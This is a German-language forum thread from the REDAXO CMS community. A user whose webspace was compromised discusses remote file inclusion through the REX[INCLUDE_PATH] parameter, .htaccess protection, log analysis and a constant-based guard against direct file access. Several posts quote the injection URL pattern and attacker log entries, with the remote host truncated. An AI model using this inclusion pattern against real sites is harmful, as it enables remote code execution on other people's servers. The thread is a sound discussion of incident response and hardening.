Sicherheit

[tomorrow]

Hallo ..
mir wurde leider heute der webspace von meinem provider gesperrt bzw teilweise weil sie folgende konstrukte in skripten für zu unsicher halten

Code: Alles auswählen

include_once $REX['INCLUDE_PATH']."/functions/function_rex_time.inc.php";

Durch die Uebergabe einer URL an das Script

/redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://...

in der gezeigten Form kann externer Code ausgefuehrt werden.

ist das bei register globals off auch noch eine sicherheitslücke ??

wie seht ihr das ??[/quote]

[Michael83]

Hallo,

durch die .htaccess-Datei im include-Ordner kann die Datei nicht direkt aufgerufen werden. Der Server sollte nur eine Fehlermeldung ausspucken.

[tomorrow]

Hi,
danke für deine antwort ..

ja die .htaccess datei war auch vorhanden ...
aber irgendwie hat sie nicht gegriffen, ich befürchte sie wurde durch einen voherigen angriff ausgehebelt, denn sie war nicht mehr im originalzustand..
jedenfalls habe ich in alle dateien noch zusätzlich mit eingebaut das sie nur ausgeführt werden wenn includiert wurden damit sie nichtdirekt angesprungen werden können, falls register global off und .htaccess datei nicht greifen ..

Code: Alles auswählen

if(!defined('vorher_gesetzte_konstante')){exit;}

vielleicht könnte man so ein sicherheits-feature noch in einen release einbauen ??

[Ruediger.Nitzsche]

Hattest Du nur REDAXO oder auch andere Software in dem Account laufen?

Rüdiger

[tomorrow]

ja, ich hatte auch noch andere software in benutzung und zwar phpbb3 und eine selbstprogrammierte bilder galerie und redaxo module ..

[Ruediger.Nitzsche]

Da würde ich zwingend mal die Logfiles analysieren, weil dort die Lücke zu vermuten ist, wenn der Account dann kompromittiert ist, kann natürlich jede Datei manipuliert werden.

Rüdiger

[tomorrow]

da .. und dort .. kannste dich mal konkreter ausdrücken, bitte ??

oder meinst du alle genannten? also überall kann ne lücke sein nur bei redaxo nicht ??

[Koala]

oder meinst du alle genannten? also überall kann ne lücke sein nur bei redaxo nicht ??

Überall kann eine Lücke sein, nur in der Grundversion von Redaxo nicht. Sagen wirs mal so lang.
D.h., wenn du Redaxo erweiters (mit Modulen/Addons etc.), dann kann auch darüber eine Lücke entstehen. Um es genau zu wissen, bleibt nur die Analyse der Logfiles. Alles andere wäre nur reine Spekulation.

Was für ein Server läuft da bei dir (Apache, IIS)?
PHP-Version?

[tomorrow]

huhu ..

ich habe mir also die logfiles angesehen ..
und leider lässt sich, anhand dieser, nicht feststellen wie die ersten kompromitierenden dateien auf den server gekommen sind ..

es ist aber stark anzunehmen das der webspace bereits manipuliert war als redaxo zwecks cross-site skripting angesprungen wurde

der erste verdächtige logeintrag den ich finden konnte sieht ca. so aus ..:

Code: Alles auswählen

/index.php?article_id=4//redaxo/login.php?REX[INCLUDE_PATH]=http://www.....

auffällig dabei ist das in der redaxo version die damals installiert war gar keine datei

/redaxo/login.php

vorhanden sein sollte entweder hatte sie jemand dort schon erstellt oder einfach vermutet das es sie dort gibt .. ärgere mich gerade das ich das alles schon gelöscht habe


dannach sehen die verdächtigen zeilen ca so aus :

Code: Alles auswählen

/index.php?article_id=4/?REX[INCLUDE_PATH]=http://..

und schliesslich dann nachdem es gelungen war dateien in dem webspace zu erstellen so :

//redaxo/include//generated/templates/fx29id1.txt??

bei dem umfang der manipulation, die ich vorfand: "mehrere dateien in verschiedenen ordnern und geänderter .htacces datei" befürchte ich es hat jemand das ftp passwort erschnüffelt .. obwohl es kein einfaches war ..

der webserver ist übrigens apache 2.2 mit php 5.x
auf dem webspace war bzw ist allow_url_include erlaubt, wo ich persönlich das nicht so gut finde, als default einstellung ..
wie dem auch sei .. jedenfalls geht es hier nicht wirklich um einen redaxo bug .. daher viellicht den threat verschieben .. ?

[tomorrow]

Ok abschliessend möchte ich noch folgendes hinzufügen ..
das ganze problem ist nur aus meiner unwissenheit entstanden, nämlich das auf meinem webspace .htaccess dateien ignoriert werden da ich dafür extra bezahlen müsste .. ist ein bischen seltsam diese politik .. ein webspace an zu bieten mit 2 datenbanken das aber keine .htacces features, naja ..

wie dem auch sei ... aber gerade vor diesem hintergrund würde ich doch anregen wollen das man ein sicherheits-feature, wie oben genannt einbaut .. damit man redaxo auch ohne .htaccess feature verwenden kann ..
wer weiss wie viele noch redaxo nutzen ohne zu wissen das htacces nicht funktioniert ........ !!!??!

[Ruediger.Nitzsche]

wer weiss wie viele noch redaxo nutzen ohne zu wissen das htacces nicht funktioniert ........ !!!??!

Aus dem Grund ist in den neuen Versionen auch eine Überprüfung bei der Installation enthalten, ob die .htaccess funktioniert (zu den Geschäftspraktiken Deines Hosters sage ich mal lieber nix).

Rüdiger

[tomorrow]

naja ich hbe das auf meinem webserver zu hause entwickelt, da geht natürlich htaccess und dann beim überspielen nicht daran gedacht das es dort nicht exisitert .. also bitte wenn möglich baut das ein .. ist ne einmalige sache braucht nich sooo viel zeit und macht das leben für viele sicherer

[Koala]

jedenfalls habe ich in alle dateien noch zusätzlich mit eingebaut das sie nur ausgeführt werden wenn includiert wurden damit sie nichtdirekt angesprungen werden können, falls register global off und .htaccess datei nicht greifen ..

Code: Alles auswählen

if(!defined('vorher_gesetzte_konstante')){exit;}

Kannst du das bitte etwas ausführlicher erläutern, was genau du da wo gemacht hast? Ich kann deiner Erklärung hier nicht folgen

[tomorrow]

ja klar ..

ich habe einfach in der master.inc.php (so heisst sie glaube ich) eine konstante definiert, also ziemlich am anfang der datei:

Code: Alles auswählen

define('DEFINIERTE_KONSTANTE',1);

so dass diese konstante dann bei allen dateien die diese includen, oder die von ihr includiert werden gesetzt ist ..

bei diesen dateien wiederum, solche die nicht direkt aufgerufen werden dürfen, weil zB ein

Code: Alles auswählen

include_once $variable."irgendwas";

darin vorkommt, habe ich in der ersten zeile folgendes gesetzt

Code: Alles auswählen

if(!defined('DEFINIERTE_KONSTANTE')){exit;}

sodass jeder direkte aufruf der datei mit einem exit resultiert, da man ja eine konstante nicht per request setzen kann

thats all ..

ok, den namen der konstanten könnte man erraten und dann eine solche datei dann wiederum von einem entfernten server includieren .. aber das würde für denjenigen nicht den gewünschten effekt bieten eben eigene skripte auf entfernten server aus zu führen um zB mails zu versenden .. etc ..

sollte doch funktionieren oder sehe ich das falsch ??